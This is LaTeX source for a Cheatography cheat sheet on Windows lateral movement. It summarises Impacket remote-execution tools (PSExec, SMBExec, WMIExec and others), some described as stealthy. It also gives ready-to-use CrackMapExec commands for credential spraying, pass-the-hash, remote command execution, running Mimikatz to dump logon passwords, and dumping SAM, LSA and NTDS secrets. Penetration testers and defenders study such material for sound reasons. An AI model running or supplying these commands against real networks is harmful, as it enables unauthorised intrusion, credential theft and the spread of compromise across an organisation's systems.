\author{tz-pl}
\pdfinfo{
  /Title (windows-lateral-movement.pdf)
  /Creator (Cheatography)
  /Author (tz-pl)
  /Subject (Windows Lateral Movement Cheat Sheet)
} Switch to any value % from this page to resize cheat sheet text: % www.emerson.emory.edu/services/latex/latex_169.html \footnotesize % Small font. \begin{multicols*}{2} \begin{tabularx}{8.4cm}{x{1.368 cm} x{4.56 cm} x{1.672 cm} } \SetRowColor{DarkBackground} \mymulticolumn{3}{x{8.4cm}}{\bf\textcolor{white}{Impacket}} \tn % Row 0 \SetRowColor{LightBackground} {\bf{PSExec}} & Writable share required, default ADMIN\$. Interactive shell or single command. Similar to psexec.exe, uses RemComSVC. & SMB - 445 \tn % Row Count 5 (+ 5) % Row 1 \SetRowColor{white} {\bf{SMBExec}} & No writable share required. Requires 4 SMB Connections. Doesn't use RemComSVC. Semi-interactive shell or single command. & SMB - 445 \tn % Row Count 10 (+ 5) % Row 2 \SetRowColor{LightBackground} {\bf{ATExec}} & Writable share required, default ADMIN\$. Run a single command through task scheduler. & SMB - 445 \tn % Row Count 14 (+ 4) % Row 3 \SetRowColor{white} {\bf{WMIEexe}} & Semi-interactive shell through WMI. No service/agent installation require, runs elevate privileges if possible. Stealthy. & RPC, WMI - 135 \tn % Row Count 20 (+ 6) % Row 4 \SetRowColor{LightBackground} {\bf{DCOMExec}} & Semi-interactive shell, similar to WMIexec but using different DCOM endpoints. Blocked by default due to Windows firewall rules. & RCP, DCOM - 135 \tn % Row Count 26 (+ 6) \hhline{>{\arrayrulecolor{DarkBackground}}---} \SetRowColor{LightBackground} \mymulticolumn{3}{x{8.4cm}}{{\bf{Example:}} \newline `python \textless{}script.py\textgreater{} domain/user:password@IP \textless{}command\textgreater{}` \newline \newline PSExec, SMBExec, WMIExec will obtain shells if \textless{}command\textgreater{} is blank} \tn \hhline{>{\arrayrulecolor{DarkBackground}}---} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{CrackMapExec}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{Swiss army knife for pentesting with many features. Spray credentials across environment to enumerate shares, sessions, disks, users, login privileges, execute commands, dump SAM and LSA secrets, run mimikatz, and more. \{\{nl\}\}Can perform command execution via Impacket's smbexec, wmiexec, atexec.} \tn % Row Count 6 (+ 6) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{{\bf{Spray domain creds:}} `crackmapexec -u user -p 'P@ssw0rd' -d domain.com`} \tn % Row Count 8 (+ 2) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{{\bf{Spray local creds:}} `crackmapexec -u user -p 'P@ssw0rd' -{}-local-user`} \tn % Row Count 10 (+ 2) % Row 3 \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{{\bf{Spray creds from files:}} `crackmapexec -u users.txt -p passwords.txt`} \tn % Row Count 12 (+ 2) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{{\bf{Pass-the-hash:}} `crackmapexec -u user -H NTLMhash`} \tn % Row Count 14 (+ 2) % Row 5 \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{{\bf{Execute command:}} `crackmapexec -u user -p 'password' -{}-exec-method smbexec -x whoami`} \tn % Row Count 17 (+ 3) % Row 6 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{{\bf{Run Mimikatz:}} `crackmapexec -u user -p 'password' -M \seqsplit{modules/credentials/mimiaktz}.py -o \seqsplit{COMMAND='privilege::debug;sekurlsa::logonpasswords'`}} \tn % Row Count 21 (+ 4) % Row 7 \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{{\bf{Common Enumeration Options}}} \tn % Row Count 22 (+ 1) % Row 8 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{Enumerate shares: `-{}-shares`} \tn % Row Count 23 (+ 1) % Row 9 \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{Dump sam, lsa or ntds: `-{}-sam` `-{}-lsa` `-{}-ntds`} \tn % Row Count 24 (+ 1) % Row 10 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{Sessions: `-{}-sessions`} \tn % Row Count 25 (+ 1) % Row 11 \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{Logged on users: `-{}-lusers`} \tn % Row Count 26 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} % That's all folks \end{multicols*} \end{document}